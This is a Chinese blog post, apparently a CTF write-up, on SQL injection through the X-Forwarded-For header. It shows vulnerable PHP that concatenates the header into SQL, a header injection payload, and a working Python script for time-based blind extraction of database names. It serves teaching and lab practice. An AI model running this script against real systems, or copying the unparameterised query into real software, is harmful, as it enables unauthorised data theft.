机缘巧合接触了一点关于sql注入的网络安全问题
依托 headers 的 sql 注入
一般来说大家都很清楚用户输入的危险性,通常会对用户表单提交的数据进行过滤(引号转码)。
但是如果写过网络爬虫,那么就很清楚其实http的headers 也是由用户自己构造的,因此对一些从headers获取的变量就不能掉以轻心。比如<strongstyle="color:#890729;">userAgent, ip等。
这里有一个sql注入的题目:who are you? -- http://www.shiyanbar.com/ctf/1941
代码漏洞示例
if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
$cip = $_SERVER["HTTP_CLIENT_IP"];
} else if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else if (!empty($_SERVER["REMOTE_ADDR"])) {
$cip = $_SERVER["REMOTE_ADDR"];
} else {
$cip = 'unknow';
}
// 未对ip 进行安全转码
echo 'Your IP address is : '.$cip;
// 直接拼接sql,未使用pdo参数绑定
$sql = "INSERT INTO IP (ip) VALUES ('$cip') ";
$DB->query($sql);
构造sql注入的headers
接触过爬虫/CURL都很熟悉了,构造headers参数就行,以python为例:
headers = {
"X-forwarded-for": "'+(select 1) and '1'='1"
}
req=requests.get(url,headers=headers)
如果顺利的话,应该会类似输出 Your IP address is : '+(select 1) and '1'='1
time-based 时间盲注
看到这里,你可能跟我一样有个疑问。怎么才能破解数据库的信息呢?虽然可以Drop database *;
...
我们只能构造sql,并让服务器运行,却不能让页面输出sql的查询结果
这时候时间盲注就排上用场了 Sql注入系列详解(一)---基于时间差的盲注
它的原理很容易理解:
- sql执行速度,在查询条件不存在时响应很快(跟查询语句有关)
-
sleep()
语句可以人为控制sql响应时间 - 虽然不能控制页面的输出,但是可以通过
sleep()
来控制页面响应时间。根据页面响应时间来判断是否命中查询信息
所以核心思想是,通过sql语句控制页面的响应时间
破解过程非常暴力,看代码一目了然:
def crack_records(url, sql, max_row, max_length):
#guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
# mysql 不区分大小写
guess = string.ascii_lowercase+string.digits+string.punctuation
res = []
for n in range(0,max_row): #假设爆破前 max_row 个记录
result=''
for i in range(1,max_length): #爆破字符串长度,假设不超过 max_length 长度
flag=0
for str in guess: #爆破该位置的字符
headers = {"X-forwarded-for":"'+"+" (select case when (substring((%s limit 1 offset %d) FROM %d FOR 1)='%s') then sleep(8) else 1 end) and '1'='1" % (sql,n,i,str)}
try:
req=requests.get(url,headers=headers,timeout=6)
except:
result+=str
flag=1
print('正在扫描第%d个记录,the result now is '%(n+1) ,result)
break
if flag==0:
break
res.append(result)
#
if i==1 and flag==0:
print('扫描完成')
break
return res
# 除information_schema外的database
sql = "select schema_name from information_schema.SCHEMATA WHERE schema_name<>'information_schema' "
res = crack_records(url, sql, 100, 500)
print (res)
文章参考
总结
- 破解过程非常耗时,根据网页的响应时长调整timeout阈值
- 当网页因为其他原因超时相应时会产生误差,因此网络不好的情况下需要重复破解以精确结果。
- 这些人好特么聪明啊啊啊啊啊!!!